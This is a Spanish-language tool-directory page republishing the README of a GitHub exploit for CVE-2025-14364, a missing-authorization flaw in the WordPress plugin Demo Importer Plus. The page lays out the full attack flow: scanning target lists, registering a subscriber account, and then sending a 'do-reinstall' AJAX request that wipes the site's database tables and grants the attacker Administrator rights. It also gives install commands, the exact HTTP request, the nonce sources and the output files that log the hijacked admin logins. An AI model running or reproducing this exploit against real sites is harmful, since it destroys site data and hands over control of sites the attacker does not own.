Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - Autorización faltante para Restablecimiento del sitio y Escalada de privilegios en usuarios autenticados (Suscriptor+) | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-14364
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Autorización faltante para Restablecimiento del sitio y Escalada de privilegios en usuarios autenticados (Suscriptor+)

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Autorización faltante para el restablecimiento del sitio autenticado (Suscriptor+) y escalada de privilegios

CVE-2025-14364 — Demo Importer Plus · Restablecimiento completo del sitio → Escalada de privilegios

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

Suscriptor autenticado → Administrador mediante la acción AJAX do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 Vulnerabilidad

Causa raíz:
Ajax::handle_request() registra la acción AJAX demo_importer_plus sin llamar a current_user_can(). Cualquier suscriptor autenticado puede enviar {"demo_action":"do-reinstall"} para activar wp_install(), que elimina todas las tablas de la base de datos (excepto users / usermeta) y vuelve a ejecutar la instalación de WordPress, asignando automáticamente el rol de Administrador a la cuenta atacante en el proceso.


〔 2 〕 Flujo de ataque

root@kitploit:~
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role

〔 3 〕 Instalación

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 Uso

root@kitploit:~
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s

Formato de objetivos — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► Modo 1 · Diagnosticar

Sondea cuatro endpoints por host y guarda los resultados limpios.

root@kitploit:~
Mode: 1

Salida → diagnostics_results.txt · passed_targets.txt


► Modo 2 · Registrar

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

Revisa tu bandeja de entrada y haz clic en el enlace de activación antes de ejecutar el Modo 3.

Salida → register_results.txt


► Modo 3 · Explotar

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

En caso de éxito, la herramienta imprime:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

Y escribe en exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 Archivos de salida


〔 6 〕 Detalle técnico

Petición vulnerable:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

Respuesta de éxito:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Extracción del nonce — dos fuentes de respaldo:

root@kitploit:~
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)

〔 7 〕 Autor y contacto

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 Aviso legal

root@kitploit:~
THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION.

The author bears zero responsibility for any actions taken with this tool
against systems the operator does not own or have explicit written
authorization to test.

Unauthorized use against third-party systems violates computer crime laws
in most jurisdictions (CFAA, CMA, and equivalents worldwide) and may result
in criminal prosecution.

You alone are responsible for ensuring you have lawful permission
before running this tool against any target.

© 2025 Nxploited · Solo investigación de seguridad · Demo Importer Plus ≤ 2.0.8 · Corregido en 2.0.9
Descargar herramienta
CVECVE-2025-14364
CVSS v3.18.8 ALTA — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PluginDemo Importer Plus
Versiones afectadasTodas las versiones ≤ 2.0.8
Autenticación necesariaSuscriptor (rol registrado más bajo)
TipoComprobación de capacidades faltante → Restablecimiento completo del sitio → Escalada de privilegios
CWECWE-862 · Autorización faltante
ArchivoContenido
diagnostics_results.txtJSON completo del sondeo por objetivo
passed_targets.txtObjetivos limpios (sin errores detectados)
register_results.txtRegistros de intentos de registro
exploit_results.txtLogin · nonce · resultados del restablecimiento · accesos admin confirmados
reset_results.txtRespuesta cruda de do-reinstall por objetivo